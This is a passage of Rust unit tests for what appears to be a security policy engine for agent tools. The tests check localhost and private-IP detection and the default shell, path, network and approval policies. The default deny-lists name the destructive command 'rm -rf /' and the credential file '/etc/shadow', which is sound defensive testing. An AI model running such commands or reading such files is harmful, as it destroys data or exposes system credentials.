        assert!(is_localhost("127.0.0.1"));
        assert!(is_localhost("::1"));
        assert!(is_localhost("0.0.0.0"));
        assert!(is_localhost("127.0.0.2"));
        assert!(!is_localhost("example.com"));
    }

    #[test]
    fn test_is_private_ip() {
        assert!(is_private_ip("10.0.0.1"));
        assert!(is_private_ip("192.168.1.1"));
        assert!(is_private_ip("172.16.0.1"));
        assert!(!is_private_ip("8.8.8.8"));
        assert!(!is_private_ip("example.com"));

        // Edges of 172.16.0.0/12 (RFC 1918): only 172.16.x.x through
        // 172.31.x.x are private. `is_private_ip` enumerates these prefixes by
        // hand, so pin both ends and the first value just outside each end.
        assert!(is_private_ip("172.31.255.255"));
        assert!(!is_private_ip("172.15.255.255"));
        assert!(!is_private_ip("172.32.0.1"));
        // Just outside 192.168.0.0/16.
        assert!(!is_private_ip("192.169.0.1"));
    }

    // ── Policy defaults ───────────────────────────────────────────────────

    #[test]
    fn test_shell_policy_default() {
        let policy = ShellPolicy::default();
        assert!(!policy.deny_all);
        assert!(policy.allowed_commands.contains(&"echo".to_string()));
        assert!(policy.denied_commands.contains(&"rm -rf /".to_string()));
    }

    #[test]
    fn test_path_policy_default() {
        let policy = PathPolicy::default();
        assert!(policy.allowed_read_paths.contains(&"/tmp".to_string()));
        assert!(policy.allowed_write_paths.contains(&"/tmp".to_string()));
        assert!(policy.denied_paths.contains(&"/etc/shadow".to_string()));
    }

    #[test]
    fn test_network_policy_default() {
        let policy = NetworkPolicy::default();
        assert!(!policy.deny_all);
        assert!(policy.allow_localhost);
        assert!(!policy.allow_private_networks);
    }

    #[test]
    fn test_security_policy_default() {
        let policy = SecurityPolicy::default();
        assert!(!policy.require_approval_all);
        assert!(policy
            .require_approval_for
            .contains(&"shell_exec".to_string()));
    }

    #[test]
    fn test_permissive_policy() {
        // "*" acts as the wildcard entry in the permissive allow-lists.
        let engine = PolicyEngine::permissive();
        let policy = engine.policy();
        assert!(policy.shell.allowed_commands.contains(&"*".to_string()));
        assert!(policy.network.allowed_hosts.contains(&"*".to_string()));
        assert!(policy.network.allow_private_networks);
    }
}